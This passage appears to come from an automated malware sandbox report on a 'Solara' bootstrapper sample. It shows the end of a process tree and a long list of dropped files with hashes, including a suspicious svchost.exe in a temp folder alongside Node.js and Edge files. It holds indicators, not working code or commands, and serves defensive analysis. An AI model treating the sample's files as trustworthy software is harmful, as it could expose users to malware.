                                                                                                                                                                      "wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64
                                                                                                                                                                      4⤵
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:2256
                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3152
                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2156
                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4404
                                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5508

                                                                                                                                                                      Network

                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                      Replay Monitor

                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                      Downloads

                                                                                                                                                                      • C:\Config.Msi\e576871.rbs

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.0MB

                                                                                                                                                                        MD5

                                                                                                                                                                        f0e186d58b857500d352f71975c8d1b8

                                                                                                                                                                        SHA1

                                                                                                                                                                        443f729954ffd306de75b0a39056c3a45ee73b74

                                                                                                                                                                        SHA256

                                                                                                                                                                        3990e86f037086553e0a1562de2ea66bcfa72176d57014204b3c4683a03c8365

                                                                                                                                                                        SHA512

                                                                                                                                                                        dc908cd1636caa861336b9110f551065a62587394d8bab02a54bec610dec493babe9c09e8ab3e1711b5a5aab9a085dd2a73685503e4ddf56b2f13d01f823930d

                                                                                                                                                                      • C:\Program Files\nodejs\node_etw_provider.man

                                                                                                                                                                        Filesize

                                                                                                                                                                        10KB

                                                                                                                                                                        MD5

                                                                                                                                                                        1d51e18a7247f47245b0751f16119498

                                                                                                                                                                        SHA1

                                                                                                                                                                        78f5d95dd07c0fcee43c6d4feab12d802d194d95

                                                                                                                                                                        SHA256

                                                                                                                                                                        1975aa34c1050b8364491394cebf6e668e2337c3107712e3eeca311262c7c46f

                                                                                                                                                                        SHA512

                                                                                                                                                                        1eccbe4ddae3d941b36616a202e5bd1b21d8e181810430a1c390513060ae9e3f12cd23f5b66ae0630fd6496b3139e2cc313381b5506465040e5a7a3543444e76

                                                                                                                                                                      • C:\Program Files\nodejs\node_etw_provider.man

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d3bc164e23e694c644e0b1ce3e3f9910

                                                                                                                                                                        SHA1

                                                                                                                                                                        1849f8b1326111b5d4d93febc2bafb3856e601bb

                                                                                                                                                                        SHA256

                                                                                                                                                                        1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4

                                                                                                                                                                        SHA512

                                                                                                                                                                        91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

                                                                                                                                                                        Filesize

                                                                                                                                                                        818B

                                                                                                                                                                        MD5

                                                                                                                                                                        2916d8b51a5cc0a350d64389bc07aef6

                                                                                                                                                                        SHA1

                                                                                                                                                                        c9d5ac416c1dd7945651bee712dbed4d158d09e1

                                                                                                                                                                        SHA256

                                                                                                                                                                        733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

                                                                                                                                                                        SHA512

                                                                                                                                                                        508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        5ad87d95c13094fa67f25442ff521efd

                                                                                                                                                                        SHA1

                                                                                                                                                                        01f1438a98e1b796e05a74131e6bb9d66c9e8542

                                                                                                                                                                        SHA256

                                                                                                                                                                        67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

                                                                                                                                                                        SHA512

                                                                                                                                                                        7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        754B

                                                                                                                                                                        MD5

                                                                                                                                                                        d2cf52aa43e18fdc87562d4c1303f46a

                                                                                                                                                                        SHA1

                                                                                                                                                                        58fb4a65fffb438630351e7cafd322579817e5e1

                                                                                                                                                                        SHA256

                                                                                                                                                                        45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

                                                                                                                                                                        SHA512

                                                                                                                                                                        54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

                                                                                                                                                                        Filesize

                                                                                                                                                                        771B

                                                                                                                                                                        MD5

                                                                                                                                                                        e9dc66f98e5f7ff720bf603fff36ebc5

                                                                                                                                                                        SHA1

                                                                                                                                                                        f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b

                                                                                                                                                                        SHA256

                                                                                                                                                                        b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79

                                                                                                                                                                        SHA512

                                                                                                                                                                        8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        730B

                                                                                                                                                                        MD5

                                                                                                                                                                        072ac9ab0c4667f8f876becedfe10ee0

                                                                                                                                                                        SHA1

                                                                                                                                                                        0227492dcdc7fb8de1d14f9d3421c333230cf8fe

                                                                                                                                                                        SHA256

                                                                                                                                                                        2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

                                                                                                                                                                        SHA512

                                                                                                                                                                        f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d116a360376e31950428ed26eae9ffd4

                                                                                                                                                                        SHA1

                                                                                                                                                                        192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

                                                                                                                                                                        SHA256

                                                                                                                                                                        c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

                                                                                                                                                                        SHA512

                                                                                                                                                                        5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        802B

                                                                                                                                                                        MD5

                                                                                                                                                                        d7c8fab641cd22d2cd30d2999cc77040

                                                                                                                                                                        SHA1

                                                                                                                                                                        d293601583b1454ad5415260e4378217d569538e

                                                                                                                                                                        SHA256

                                                                                                                                                                        04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

                                                                                                                                                                        SHA512

                                                                                                                                                                        278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

                                                                                                                                                                        Filesize

                                                                                                                                                                        16KB

                                                                                                                                                                        MD5

                                                                                                                                                                        bc0c0eeede037aa152345ab1f9774e92

                                                                                                                                                                        SHA1

                                                                                                                                                                        56e0f71900f0ef8294e46757ec14c0c11ed31d4e

                                                                                                                                                                        SHA256

                                                                                                                                                                        7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

                                                                                                                                                                        SHA512

                                                                                                                                                                        5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        780B

                                                                                                                                                                        MD5

                                                                                                                                                                        b020de8f88eacc104c21d6e6cacc636d

                                                                                                                                                                        SHA1

                                                                                                                                                                        20b35e641e3a5ea25f012e13d69fab37e3d68d6b

                                                                                                                                                                        SHA256

                                                                                                                                                                        3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

                                                                                                                                                                        SHA512

                                                                                                                                                                        4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        763B

                                                                                                                                                                        MD5

                                                                                                                                                                        7428aa9f83c500c4a434f8848ee23851

                                                                                                                                                                        SHA1

                                                                                                                                                                        166b3e1c1b7d7cb7b070108876492529f546219f

                                                                                                                                                                        SHA256

                                                                                                                                                                        1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

                                                                                                                                                                        SHA512

                                                                                                                                                                        c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts

                                                                                                                                                                        Filesize

                                                                                                                                                                        4KB

                                                                                                                                                                        MD5

                                                                                                                                                                        f0bd53316e08991d94586331f9c11d97

                                                                                                                                                                        SHA1

                                                                                                                                                                        f5a7a6dc0da46c3e077764cfb3e928c4a75d383e

                                                                                                                                                                        SHA256

                                                                                                                                                                        dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef

                                                                                                                                                                        SHA512

                                                                                                                                                                        fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        771B

                                                                                                                                                                        MD5

                                                                                                                                                                        1d7c74bcd1904d125f6aff37749dc069

                                                                                                                                                                        SHA1

                                                                                                                                                                        21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab

                                                                                                                                                                        SHA256

                                                                                                                                                                        24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9

                                                                                                                                                                        SHA512

                                                                                                                                                                        b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

                                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url

                                                                                                                                                                        Filesize

                                                                                                                                                                        168B

                                                                                                                                                                        MD5

                                                                                                                                                                        db7dbbc86e432573e54dedbcc02cb4a1

                                                                                                                                                                        SHA1

                                                                                                                                                                        cff9cfb98cff2d86b35dc680b405e8036bbbda47

                                                                                                                                                                        SHA256

                                                                                                                                                                        7cf8a9c96f9016132be81fd89f9573566b7dc70244a28eb59d573c2fdba1def9

                                                                                                                                                                        SHA512

                                                                                                                                                                        8f35f2e7dac250c66b209acecab836d3ecf244857b81bacebc214f0956ec108585990f23ff3f741678e371b0bee78dd50029d0af257a3bb6ab3b43df1e39f2ec

                                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url

                                                                                                                                                                        Filesize

                                                                                                                                                                        133B

                                                                                                                                                                        MD5

                                                                                                                                                                        35b86e177ab52108bd9fed7425a9e34a

                                                                                                                                                                        SHA1

                                                                                                                                                                        76a1f47a10e3ab829f676838147875d75022c70c

                                                                                                                                                                        SHA256

                                                                                                                                                                        afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319

                                                                                                                                                                        SHA512

                                                                                                                                                                        3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        6486ee9e961a437dadb68ff1544d18a8

                                                                                                                                                                        SHA1

                                                                                                                                                                        05f4daccca0bc1ce73fe71ad2325ba5dadd3df25

                                                                                                                                                                        SHA256

                                                                                                                                                                        9a98b4686c9e90672a548c873943b3027fb111f7992263111d912318429f5834

                                                                                                                                                                        SHA512

                                                                                                                                                                        ee3659f68a46f37f340f98b85a7aa289e700c5ced2a4f0104673bb5f18cc82d1e9b838ec0278407213c6ed2073998e7aad78a7a39390b7e460c8e26dfa91d0e9

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        2dfecbb576ee9795c5284da8a2a3c7f5

                                                                                                                                                                        SHA1

                                                                                                                                                                        f1f0a6a97850aca2b4ab267a017564af02f24948

                                                                                                                                                                        SHA256

                                                                                                                                                                        dca6901942fa748fc01339192c0738a06847d8497c9c61298f1e5df1f8352fb0

                                                                                                                                                                        SHA512

                                                                                                                                                                        d664cc261113427810dd0b2d32763ddd08611a528fe6b285782d6b8ac03304b72a90fe7f3f7142e825ab8d948d5c9cf52f420546f3796b2ac23f3d00f3c17389

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        5KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d05d8ce4c249ca9a96fb90185c77b454

                                                                                                                                                                        SHA1

                                                                                                                                                                        f4cafdca2111779a7bbeafcfcf407e48338ce260

                                                                                                                                                                        SHA256

                                                                                                                                                                        02b77c396a3a51294d5cd4f4971c29f8569ac33fbc990c7f67ec75ece720d34b

                                                                                                                                                                        SHA512

                                                                                                                                                                        1ec100df797b536b01a90ec9910e2480887e5075a1dcdf6bdcfc1a8d2ea77a95e2b68b467f489e240f610ceed16b7554bec6f88940832ae68af508efb2d6f0e6

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                        Filesize

                                                                                                                                                                        5KB

                                                                                                                                                                        MD5

                                                                                                                                                                        19936e4d07bc64b017823883ba653ced

                                                                                                                                                                        SHA1

                                                                                                                                                                        8e6be7c60c13b4a092d410362c86159f38a60300

                                                                                                                                                                        SHA256

                                                                                                                                                                        d57fa73eddb4650021146f1f094817be12948fe013f38b5e81f38665fc330e1d

                                                                                                                                                                        SHA512

                                                                                                                                                                        b8d32d09faba89a72c31a0b83f66bc70ec1f6119df5fcc2f5c620e1a1cc8de30f69fe83e44e475c6a83fecdb218ded8a8c271ce181ede1402bd6dae5625cd76f

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                        Filesize

                                                                                                                                                                        16B

                                                                                                                                                                        MD5

                                                                                                                                                                        46295cac801e5d4857d09837238a6394

                                                                                                                                                                        SHA1

                                                                                                                                                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                        SHA256

                                                                                                                                                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                        SHA512

                                                                                                                                                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                        Filesize

                                                                                                                                                                        16B

                                                                                                                                                                        MD5

                                                                                                                                                                        206702161f94c5cd39fadd03f4014d98

                                                                                                                                                                        SHA1

                                                                                                                                                                        bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                                                                        SHA256

                                                                                                                                                                        1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                                                                        SHA512

                                                                                                                                                                        0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        11KB

                                                                                                                                                                        MD5

                                                                                                                                                                        623c131d5a0390117664dc402447400b

                                                                                                                                                                        SHA1

                                                                                                                                                                        3e23a4f9fea14b3bd6f44eed89136327ffe0288a

                                                                                                                                                                        SHA256

                                                                                                                                                                        0d7c842dfd35c555843b0947026e8c4a87835bb9b16a66e093ada9f1063891b3

                                                                                                                                                                        SHA512

                                                                                                                                                                        a494640dc355d7d16849215bcd356a760b079fcf8da2352cdf0951ba479f225a6e2c7d5b15301d5cc5632d4d2c1632743ede0af262362fe5a3d614c427f9e6e7

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        1.6MB

                                                                                                                                                                        MD5

                                                                                                                                                                        bc614545adbcc6abbf8e00497a780089

                                                                                                                                                                        SHA1

                                                                                                                                                                        4433acadf5ea587063eb8837cba1876096eaedbb

                                                                                                                                                                        SHA256

                                                                                                                                                                        40b1bdb59ba58da551b12eecdf8645cfa6e9e149f602560de381a7bef398ca6a

                                                                                                                                                                        SHA512

                                                                                                                                                                        163900133634a1adc0a3a60fad1e32205851b0c2a2bf0660acb21b3b127648882a54a35bd7f12fba7cf5226a4be54c9507593d69a9cd83fd81c34b478d8c67af

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SolaraBootstrapper.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        797KB

                                                                                                                                                                        MD5

                                                                                                                                                                        36b62ba7d1b5e149a2c297f11e0417ee

                                                                                                                                                                        SHA1

                                                                                                                                                                        ce1b828476274375e632542c4842a6b002955603

                                                                                                                                                                        SHA256

                                                                                                                                                                        8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c

                                                                                                                                                                        SHA512

                                                                                                                                                                        fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\svchost.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        8.1MB

                                                                                                                                                                        MD5

                                                                                                                                                                        21a88f447321c9ff2e4286a2894953d0

                                                                                                                                                                        SHA1

                                                                                                                                                                        244dae717f043da529938c4b3ec9674888715aa6

                                                                                                                                                                        SHA256

                                                                                                                                                                        b8ab66afb11fcb8aa323f9d90e79e5b5a846419e3d87492816dae9cf12266d97

                                                                                                                                                                        SHA512

                                                                                                                                                                        6beb2fc6ebad08dd7238f9bebeb17b9f3d9edbbd6ba282196ae81ca9776cd0828e4677af93c1e676fe9c1710928a50d27208c2431512bd30a41c12ae1e7fe9dd

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\get-intrinsic\.nycrc

                                                                                                                                                                        Filesize

                                                                                                                                                                        139B

                                                                                                                                                                        MD5

                                                                                                                                                                        d0104f79f0b4f03bbcd3b287fa04cf8c

                                                                                                                                                                        SHA1

                                                                                                                                                                        54f9d7adf8943cb07f821435bb269eb4ba40ccc2

                                                                                                                                                                        SHA256

                                                                                                                                                                        997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a

                                                                                                                                                                        SHA512

                                                                                                                                                                        daf9b5445cfc02397f398adfa0258f2489b70699dfec6ca7e5b85afe5671fdcabe59edee332f718f5e5778feb1e301778dffe93bb28c1c0914f669659bad39c6

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\has-proto\.eslintrc

                                                                                                                                                                        Filesize

                                                                                                                                                                        43B

                                                                                                                                                                        MD5

                                                                                                                                                                        c28b0fe9be6e306cc2ad30fe00e3db10

                                                                                                                                                                        SHA1

                                                                                                                                                                        af79c81bd61c9a937fca18425dd84cdf8317c8b9

                                                                                                                                                                        SHA256

                                                                                                                                                                        0694050195fc694c5846b0a2a66b437ac775da988f0a779c55fb892597f7f641

                                                                                                                                                                        SHA512

                                                                                                                                                                        e3eca17804522ffa4f41e836e76e397a310a20e8261a38115b67e8b644444153039d04198fb470f45be2997d2c7a72b15bd4771a02c741b3cbc072ea6ef432e9

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\hasown\.nycrc

                                                                                                                                                                        Filesize

                                                                                                                                                                        216B

                                                                                                                                                                        MD5

                                                                                                                                                                        c2ab942102236f987048d0d84d73d960

                                                                                                                                                                        SHA1

                                                                                                                                                                        95462172699187ac02eaec6074024b26e6d71cff

                                                                                                                                                                        SHA256

                                                                                                                                                                        948366fea3b423a46366326d0bb2e54b08abd1cf0b243678ba6625740c40da5a

                                                                                                                                                                        SHA512

                                                                                                                                                                        e36b20c16ceeb090750f3865efc8d7fd983ae4e8b41c30cc3865d2fd4925bf5902627e1f1ed46c0ff2453f076ef9de34be899ef57754b29cd158440071318479

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\vary\LICENSE

                                                                                                                                                                        Filesize

                                                                                                                                                                        1KB

                                                                                                                                                                        MD5

                                                                                                                                                                        13babc4f212ce635d68da544339c962b

                                                                                                                                                                        SHA1

                                                                                                                                                                        4881ad2ec8eb2470a7049421047c6d076f48f1de

                                                                                                                                                                        SHA256

                                                                                                                                                                        bd47ce7b88c7759630d1e2b9fcfa170a0f1fde522be09e13fb1581a79d090400

                                                                                                                                                                        SHA512

                                                                                                                                                                        40e30174433408e0e2ed46d24373b12def47f545d9183b7bce28d4ddd8c8bb528075c7f20e118f37661db9f1bba358999d81a14425eb3e0a4a20865dfcb53182

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Newtonsoft.Json.dll

                                                                                                                                                                        Filesize

                                                                                                                                                                        695KB

                                                                                                                                                                        MD5

                                                                                                                                                                        195ffb7167db3219b217c4fd439eedd6

                                                                                                                                                                        SHA1

                                                                                                                                                                        1e76e6099570ede620b76ed47cf8d03a936d49f8

                                                                                                                                                                        SHA256

                                                                                                                                                                        e1e27af7b07eeedf5ce71a9255f0422816a6fc5849a483c6714e1b472044fa9d

                                                                                                                                                                        SHA512

                                                                                                                                                                        56eb7f070929b239642dab729537dde2c2287bdb852ad9e80b5358c74b14bc2b2dded910d0e3b6304ea27eb587e5f19db0a92e1cbae6a70fb20b4ef05057e4ac

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Wpf.Ui.dll

                                                                                                                                                                        Filesize

                                                                                                                                                                        5.2MB

                                                                                                                                                                        MD5

                                                                                                                                                                        aead90ab96e2853f59be27c4ec1e4853

                                                                                                                                                                        SHA1

                                                                                                                                                                        43cdedde26488d3209e17efff9a51e1f944eb35f

                                                                                                                                                                        SHA256

                                                                                                                                                                        46cfbe804b29c500ebc0b39372e64c4c8b4f7a8e9b220b5f26a9adf42fcb2aed

                                                                                                                                                                        SHA512

                                                                                                                                                                        f5044f2ee63906287460b9adabfcf3c93c60b51c86549e33474c4d7f81c4f86cd03cd611df94de31804c53006977874b8deb67c4bf9ea1c2b70c459b3a44b38d

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe

                                                                                                                                                                        Filesize

                                                                                                                                                                        90KB

                                                                                                                                                                        MD5

                                                                                                                                                                        d84e7f79f4f0d7074802d2d6e6f3579e

                                                                                                                                                                        SHA1

                                                                                                                                                                        494937256229ef022ff05855c3d410ac3e7df721

                                                                                                                                                                        SHA256

                                                                                                                                                                        dcfc2b4fa3185df415855ec54395d9c36612f68100d046d8c69659da01f7d227

                                                                                                                                                                        SHA512

                                                                                                                                                                        ed7b0ac098c8184b611b83158eaa86619001e74dba079d398b34ac694ce404ba133c2baf43051840132d6a3a089a375550072543b9fab2549d57320d13502260

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        4a4333a2f94e5c194ed9aae40fe1a9d1

                                                                                                                                                                        SHA1

                                                                                                                                                                        62477fc6eefa67bb6424a8f57bac072ee424235b

                                                                                                                                                                        SHA256

                                                                                                                                                                        912dc6208e32e2558135763f8db8b63a482084a21f17b8adc6090e81bb9116a8

                                                                                                                                                                        SHA512

                                                                                                                                                                        3d05657caf1f439dcc273c1cd36370c092678ca9113f6130412d52aa46fff81239df68e3da9eace597b4acf1d12de92a52be1cc5249f79f4870e0386cc510d52

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad\settings.dat

                                                                                                                                                                        Filesize

                                                                                                                                                                        152B

                                                                                                                                                                        MD5

                                                                                                                                                                        1a2f51d11b00c6ffffb4ab675eb6a5ee

                                                                                                                                                                        SHA1

                                                                                                                                                                        575d1a80b88056be534b3d07f8c3959d8a464305

                                                                                                                                                                        SHA256

                                                                                                                                                                        54d1554208deda7ab83e755a87f5f26ec4de372221033b8a89cc17682a549837

                                                                                                                                                                        SHA512

                                                                                                                                                                        a165228960a61d62c7574d41421c1adb6fc0bc922a7c257a2a47bf74d51a4366ffa5686d39be45587ad5e57ef0c0cd057ec2bba9fe9f478663ebb574da8a11d1

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Sync Data\LevelDB\MANIFEST-000001

                                                                                                                                                                        Filesize

                                                                                                                                                                        41B

                                                                                                                                                                        MD5

                                                                                                                                                                        5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                        SHA1

                                                                                                                                                                        d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                        SHA256

                                                                                                                                                                        f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                        SHA512

                                                                                                                                                                        de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                        MD5

                                                                                                                                                                        2bc64e107c782f2c6716b91ab7cfa7da

                                                                                                                                                                        SHA1

                                                                                                                                                                        ab07895ac10b744f9154819af8f36d80a34b6b46

                                                                                                                                                                        SHA256

                                                                                                                                                                        097c3cdc81ac9194e7dafacaae7f4fba6a136718b2336446f2e78f2511849860

                                                                                                                                                                        SHA512

                                                                                                                                                                        15fabd88f25fee647fd31ed31aca16fdecb6f5e73bffb610a459866ceb683b8f2541b29f44b692fab83d17f22893d0b2d7f96bba50ec927b39806e1bb14c1e95

                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Local State~RFe59575d.TMP

                                                                                                                                                                        Filesize

                                                                                                                                                                        8KB

                                                                                                                                                                        MD5

                                                                                                                                                                        394580d9b9c58e1986b0ff9cc6071395

                                                                                                                                                                        SHA1

                                                                                                                                                                        90b9c9e44bb8a2c66963f28e1504a22d82895c0a

                                                                                                                                                                        SHA256

                                                                                                                                                                        a80d0beda3b460c81b5462a4178ff37276404f82e2a69a72ddc5df1d5f8d6f59

